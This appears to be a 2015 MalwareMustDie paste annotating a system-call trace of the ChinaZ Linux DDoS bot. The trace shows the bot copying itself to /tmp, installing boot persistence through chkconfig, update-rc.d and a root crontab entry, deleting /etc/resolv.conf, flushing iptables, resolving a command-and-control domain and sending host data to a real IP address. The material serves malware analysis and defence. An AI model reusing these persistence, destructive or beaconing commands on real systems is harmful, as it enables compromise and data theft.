
ChinaZ Reloaded

MalwareMustDie Jun 19th, 2015 (edited) 133 Never
  1. # MalwareMustDie! ChinaZ Initial execution calls &
  2. # Networking commands
  3.  
  4. /////////////////////////
  5. //
  6. //   COMMAND EXECUTION
  7. //
  8. /////////////////////////
  9.  
  10. // run..
  11.  
  12. execve("./SAMPLE"["./SAMPLE"] )
  13.  
  14. // copies itself to /tmp under a dull name with "chinaz" in it..
  15.  
  16. uname()
  17. chdir("/tmp")
  18. readlink("/proc/self/exe", "/home/YOU/test/SAMPLE", 256)
  19. open("/home/YOU/test/SAMPLE", O_RDONLY)
  20. open("/tmp/.chinaz{1434745889", O_WRONLY|O_CREAT, 0777)
  21. read(0, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
  22. write(1, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
  23.  
  24. // installer.. (init-script template, then the startup shell script it writes)
  25.  
  26. #!/bin/sh\n# chkconfig: 12345 90 90\n# description: %s\n### BEGIN INIT INFO\n# Provides:\t\t%s\n# Required-Start:\t\n# Required-Stop:\t\n# Default-Start:\t1 2 3 4 5\n# Default-Stop:\t\t\n# Short-Description:\t%s\n### END INIT INFO\ncase $1 in\nstart)\n\t%s\n\t;;\nstop)\n\t;;\n*)\n\t%s\n\t;;\nesac\n
  27. #!/bin/sh\nPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin\nfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done\ncp /lib/udev/udev /lib/udev/debug\n/lib/udev/debug\n                                                                        
  28.  
  29. // registering the self-copied malware file to start at boot (chkconfig --add / update-rc.d defaults)...
  30.  
  31. execve("/usr/local/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  32. execve("/usr/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  33. execve("/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  34. execve("/usr/local/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  35. execve("/usr/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
  36. execve("/usr/local/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  37. execve("/usr/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  38. execve("/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  39. execve("/usr/local/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  40. execve("/usr/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
  41. execve("/usr/local/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  42. execve("/usr/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  43. execve("/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  44.  
  45. // removing the original sample's boot-service entry (update-rc.d remove / chkconfig --del)...
  46.  
  47. execve("/usr/local/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  48. execve("/usr/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
  49. execve("/usr/local/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  50. execve("/usr/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  51. execve("/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
  52. execve("/usr/local/games/chkconfig"["chkconfig""--del""SAMPLE"] )
  53. execve("/usr/games/chkconfig"["chkconfig""--del""SAMPLE"] )
  54.  
  55. // setting a cron entry in /etc/crontab (runs every 3 minutes as root)...
  56.  
  57. execve("/bin/sh"["sh""-c""sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"...] )
  58. execve("/bin/sed"["sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"] )
  59.  
  60. // deleting your /etc/resolv.conf...YES..LITERALLY!
  61.  
  62. execve("/bin/sh"["sh""-c""rm -rf /etc/resolv.conf"] )
  63. execve("/bin/rm"["rm""-rf""/etc/resolv.conf"] )
  64.  
  65. // installing the config..
  66.  
  67. execve("/bin/sh"["sh""-c""touch /home/YOU/ConfigDatecz"] )
  68. execve("/usr/bin/touch"["touch""/home/YOU/ConfigDatecz"] )
  69.  
  70. // flushing iptables & installing the malicious rules (DROP on selected outbound TCP ports)
  71.  
  72. execve("/bin/sh"["sh""-c""whoami"] )
  73. execve("/bin/sh"["sh""-c""iptables --flush"]
  74. execve("/usr/bin/whoami"["whoami"] )
  75. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...]
  76. execve("/bin/sh"["sh""-c""whoami"] )
  77. execve("/usr/bin/whoami"["whoami"] )
  78. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  79. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  80. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  81. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  82. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
  83.         (...)
  84.  
  85. /////////////////////////
  86. //
  87. //     NETWORKING
  88. //
  89. /////////////////////////
  90.  
  91. // checking the loopback, local and global Ethernet interfaces, for the iptables operations..
  92.  
  93. socket(PF_INET, SOCK_DGRAM, IPPROTO_IP)
  94. {{"lo", {AF_INET, inet_addr("127.0.0.1")}},
  95. {"eth0", {AF_INET, inet_addr("a,b,c,d")}},
  96. {"ethn", {AF_INET, inet_addr("w,x,y,z")}}}})
  97.  
  98. // DNS query to resolve the CNC domain...
  99.  
  100. socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
  101. open("/etc/resolv.conf", O_RDONLY)
  102. read(4, "nameserver DNS-ADDRESS\nnameser"..., 4096)
  103. socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP)
  104. connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
  105. send(4, "\5\237\1\0\0\1\0\0\0\0\0\0\3www\5avttx\2cn\0\0\1\0\1", 30, MSG_NOSIGNAL)
  106. recvfrom(4, "\5\237\201\200\0\1\0\1\0\2\0\6\3www\5avttx\2cn\0\0\1\0\1\300\f"
  107.             {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
  108.  
  109. // sending your hostname & other uname info to the CNC..
  110.  
  111. connect(3, {sa_family=AF_INET, sin_port=htons(60000), sin_addr=inet_addr("121.42.159.37")}
  112. send(-1, "ThisIsNotLinux\0\0\0\0\0\0\0\0\0\0\0\0"..., 372, 0)
  113.  
  114. // PS: Upon a successful connection the Config.ini file will be saved.
  115.        The system will then be rebooted, ready to function as a DDoS bot.
  116.  
  117. # end